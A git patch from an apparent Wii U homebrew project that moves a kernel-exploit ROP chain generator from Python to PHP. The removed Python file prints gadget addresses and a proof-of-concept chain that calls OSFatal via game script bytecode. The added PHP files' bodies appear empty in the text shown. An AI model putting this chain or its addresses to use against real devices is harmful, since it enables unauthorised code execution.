From e3ef554d6d83379605f41c643309b23fc3355747 Mon Sep 17 00:00:00 2001 From: orboditilt <45944072+orboditilt@users.noreply.github.com> Date: Wed, 23 Jan 2019 21:31:59 +0100 Subject: [PATCH] - Use wiiuhaxx_common for creating a ROP - Add WIP kernel exploit ROP --- .gitignore | 1 + README.md | 2 + kexploit/Makefile | 24 +++-- kexploit/generate_rop.py | 74 ------------- kexploit/generatepayload.php | 174 +++++++++++++++++++++++++++++++ kexploit/wiiuhaxx_common_cfg.php | 5 + 6 files changed, 200 insertions(+), 80 deletions(-) delete mode 100644 kexploit/generate_rop.py create mode 100644 kexploit/generatepayload.php create mode 100644 kexploit/wiiuhaxx_common_cfg.php diff --git a/.gitignore b/.gitignore index 1377554..d0a17f0 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1,2 @@ *.swp +wiiuhaxx_common/ \ No newline at end of file diff --git a/README.md b/README.md index 1cf41e4..cbdf342 100644 --- a/README.md +++ b/README.md @@ -9,6 +9,8 @@ Required: * Python 3.6 or greater in path as python3 (Edit Makefile for other configs) * make +* php +* A copy of the [wiiuhaxx_common release files (>=0.3](https://github.com/wiiu-env/wiiuhaxx_common/releases) inside a folder `wiiuhaxx_common.` ``` git clone --recurse-submodules https://github.com/jam1garner/ROBChain.git && \ diff --git a/kexploit/Makefile b/kexploit/Makefile index 4f9849a..b5d3b84 100644 --- a/kexploit/Makefile +++ b/kexploit/Makefile @@ -1,14 +1,26 @@ +wiiuhaxx_common_path := ../wiiuhaxx_common/wiiu_browserhax_common.php +wiiuhaxx_common_cfg := wiiuhaxx_common_cfg.php +pymsc_asm_py := ../pymsc/asm.py + all: clean exploit.mscsb clean: rm -f exploit.mscsb payload.s main.s -exploit.mscsb: payload.s Scripts main.s - python3 ../pymsc/asm.py +exploit.mscsb: $(pymsc_asm_py) payload.s Scripts main.s + python ../pymsc/asm.py -payload.s: payload.bin - python3 generate_payload.py +payload.s: payload.bin + python generate_payload.py -main.s: rop_setup.s - python3 generate_rop.py +main.s: rop_setup.s $(wiiuhaxx_common_cfg) $(wiiuhaxx_common_path) + php generatepayload.php > main.s + +$(pymsc_asm_py): + if [ -a $(pymsc_asm_py) ]; then $(error missing $(pymsc_asm_py) (git clone recursive)); fi; + +$(wiiuhaxx_common_path): + if [ -a $(wiiuhaxx_common_path) ]; then $(error missing $(wiiuhaxx_common_path)); fi; +$(wiiuhaxx_common_cfg): + if [ -a $(wiiuhaxx_common_cfg) ]; then $(error missing $(wiiuhaxx_common_cfg)); fi; \ No newline at end of file diff --git a/kexploit/generate_rop.py b/kexploit/generate_rop.py deleted file mode 100644 index 6b15185..0000000 --- a/kexploit/generate_rop.py +++ /dev/null @@ -1,74 +0,0 @@ - -# Addresses -LOAD_R3_ADDR = 0x0C00C650 -OSFATAL_ADDR = 0x01031618 - -def write32(u32): - global script - script += f"pushInt. {hex(u32)}\n" - -def writePayloadAddress(): - global script - script += "pushVar. globalVar,mscScriptAddress\n" - -def writeEnd(): - global script - script += "#Execute ROP chain\nexit\n\n#Dunno why but I figured I might as well put it here, should never hit this though\nend" - -""" -Example payload (writeOSFatalPayload func) - -pushInt. 0xC00C650 -pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal) -pushInt. 0xBEEF0001 -pushInt. 0xBEEF0002 -pushInt. 0xBEEF0003 -pushInt. 0xBEEF0004 -pushInt. 0xBEEF0005 -pushInt. 0xBEEF0006 -pushInt. 0xBEEF0007 -pushInt. 0xBEEF0008 -pushInt. 0xBEEF0009 -pushInt. 0xBEEF000A -pushInt. 0xBEEF000B -pushInt. 0xBEEF000C -pushInt. 0xBEEF000D -pushInt. 0xBEEF000E -pushInt. 0xBEEF000F -pushInt. 0xBEEF0010 -pushInt. 0xBEEF0011 -pushInt. 0xBEEF0012 -pushInt. 0xBEEF0013 -pushInt. 0xBEEF0014 -pushInt. 0xBEEF0015 -pushInt. 0xBEEF0016 -pushInt. 0xBEEF0017 -pushInt. 0xBEEF0018 -pushInt. 0xBEEF0019 -pushInt. 0xBEEF001A -pushInt. 0x01031618 #return address (OSFatal) - -""" - -# Print out contents of payload as null terminated string -def writeOSFatalPayload(): - write32(LOAD_R3_ADDR) - writePayloadAddress() - for i in range(0x1A): - write32(0xBEEF0000 + i + 1) - write32(OSFATAL_ADDR) - writeEnd() - - -def main(): - global script - with open('rop_setup.s', 'r') as f: - script = f.read() - - writeOSFatalPayload() - - with open("main.s", 'w') as f: - f.write(script) - -if __name__ == "__main__": - main() diff --git a/kexploit/generatepayload.php b/kexploit/generatepayload.php new file mode 100644 index 0000000..0d364be --- /dev/null +++ b/kexploit/generatepayload.php @@ -0,0 +1,174 @@ + \ No newline at end of file diff --git a/kexploit/wiiuhaxx_common_cfg.php b/kexploit/wiiuhaxx_common_cfg.php new file mode 100644 index 0000000..126acf7 --- /dev/null +++ b/kexploit/wiiuhaxx_common_cfg.php @@ -0,0 +1,5 @@ + \ No newline at end of file